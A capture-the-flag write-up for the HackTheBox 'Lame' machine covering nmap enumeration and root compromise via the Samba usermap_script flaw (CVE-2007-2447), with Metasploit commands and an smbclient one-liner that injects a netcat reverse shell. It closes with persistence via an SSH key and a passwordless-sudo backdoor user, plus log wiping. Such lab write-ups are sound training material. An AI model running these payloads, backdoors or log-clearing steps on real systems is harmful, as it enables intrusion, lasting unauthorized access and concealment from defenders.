HackTheBox Lame
Writeup for HackTheBox Lame
Machine Synopsis
IP Address: 10.10.10.3
Key Exploitation Techniques:
- Remote Code Execution (RCE) through a vulnerability in Samba’s
usermap
script (CVE-2007-2447). - Immediate root access upon exploitation.
1. Enumeration
Initial reconnaissance with nmap
revealed several open ports related to common network services.
1
2
nmap -p- --min-rate 10000 10.10.10.3 -oN nmap_portscan.txt
nmap -p 21,22,139,445 -sC -sV 10.10.10.3 -oN nmap_services.txt
Nmap Results:
- Port 21 (FTP):
vsftpd 2.3.4
with anonymous login enabled. - Port 22 (SSH):
OpenSSH 4.7p1 Debian
. - Ports 139 & 445 (SMB/CIFS):
Samba smbd 3.0.20-Debian
.
The versions of vsftpd
and Samba are very old and likely contain known vulnerabilities.
2. Vulnerability Research & Exploitation
Failed Exploit Attempt: vsftpd 2.3.4
A searchsploit
lookup for vsftpd 2.3.4
immediately returns a backdoor command execution exploit. We attempted to use the Metasploit module for this vulnerability.
1
2
3
4
msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
This exploit failed to create a session. This is a common occurrence with older exploits; they may not work as expected or the vulnerability may have been patched in a non-standard way.
Successful Exploit: Samba usermap
Script (CVE-2007-2447)
A search for Samba 3.0.20
revealed a critical remote code execution vulnerability related to the usermap
script. This vulnerability allows an attacker to execute arbitrary commands as the root user by injecting shell commands into the username field of an SMB login request.
Why it Worked: The usermap
script in this version of Samba incorrectly handles character escapes when mapping usernames. By sending a specially crafted username that begins with a forward slash (/
) and a shell command enclosed in backticks (``), the system executes the command with root privileges.
We used a Python exploit script that automates this process.
1
2
# Attacker Machine: Setup a netcat listener to catch the reverse shell.
nc -nlvp 1234
1
2
# Attacker Machine: Execute the Python exploit.
python usermap_script.py 10.10.10.3 445 10.10.14.3 1234
The script successfully sent the payload, which triggered a reverse shell connection to our netcat
listener.
1
2
3
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.3] 34329
id
# uid=0(root) gid=0(root) groups=0(root)
The id
command confirmed we had successfully gained a root shell, bypassing the need for a separate privilege escalation step.
3. Flag Retrieval
With immediate root access, we could now retrieve both the user.txt
and root.txt
flags.
1
2
3
4
5
6
7
cd /home/makis
cat user.txt
<redacted>
cd /root
cat root.txt
<redacted>
4. Alternative Exploitation Methods
Method 1: Metasploit
Metasploit has a dedicated module for this vulnerability, which is a simpler and more reliable approach.
1
2
3
4
5
6
msfconsole -q
msf6 > use exploit/multi/samba/usermap_script
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.3
msf6 exploit(multi/samba/usermap_script) > set LPORT 4444
msf6 exploit(multi/samba/usermap_script) > run
Method 2: Manual SMB Client
This technique involves using the built-in smbclient
utility to manually trigger the vulnerability. The payload is directly injected into the login command.
1
2
3
4
5
# Set up a listener
nc -nlvp 1337
# Execute the command from another terminal
smbclient //10.10.10.3/tmp -c 'logon "/=`nohup nc -e /bin/sh 10.10.14.3 1337`"'
This method is less verbose and demonstrates a deeper understanding of the vulnerability without relying on pre-built scripts.
5. Post-Exploitation and Defense Evasion
Persistence
SSH Key: Install an SSH public key for reliable, passwordless
root
access.1 2 3
mkdir -p /root/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8..." >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys
Backdoor User: Create a new
root
-level user.1 2 3
useradd -m -s /bin/bash backup echo 'backup:password' | chpasswd echo 'backup ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers
Defense Evasion
Log Cleanup: Clear various system and application logs to remove evidence of the compromise.
1 2 3 4
echo > /var/log/auth.log echo > /var/log/syslog echo > /var/log/samba/log.smbd history -c